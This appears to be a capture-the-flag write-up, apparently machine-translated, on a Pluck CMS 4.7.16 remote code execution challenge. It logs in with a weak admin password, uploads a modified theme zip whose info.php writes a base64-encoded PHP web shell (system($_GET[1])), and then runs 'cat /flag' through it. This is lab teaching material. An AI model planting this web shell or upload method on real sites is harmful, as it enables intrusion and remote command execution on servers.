Table of contents
2. Use cms theme to construct Trojan horse
1. Topic
introduce:
Pluck-CMS-Pluck-4.7.16 Background RCE
Enter the topic:
Click admin on the cms page to log in:
Weak password admin login:
Successfully logged in:
Localize it:
Options --- Select a theme
Click to install the theme:
Entered the file selection page:
2. Use cms theme to construct Trojan horse
Here we need to modify the info.php file in the theme, then pack it into a zip and upload it, find the Pluck CMS in Github through a web search, and download any theme after entering:
Search · Pluck CMS (github.com)
Both of these will work:
Code download compressed package:
Zip the file and open info.php:
Change the content inside to:
<?php
file_put_contents('testshell.php',base64_decode('PD9waHAgc3lzdGVtKCRfR0VUWzFdKTs/Pg=='));
?>
Construct a one-sentence Trojan horse
file_put_contents() function: write a string to a file.
base64_decode () decodes encoded_data and returns the original data.
<?php system($_GET[1]);?> base64 encoded as PD9waHAgc3lzdGVtKCRfR0VUWzFdKTs/Pg==
Write the last sentence Trojan into info.php:
Compress the modified file:
Select the zip file and upload:
Upload succeeded:
Enter testshell.php?1=cat%20/flag on the root directory url to view the flag:
flag{eafed940-ba3f-449b-a1d2-2fab8807b484}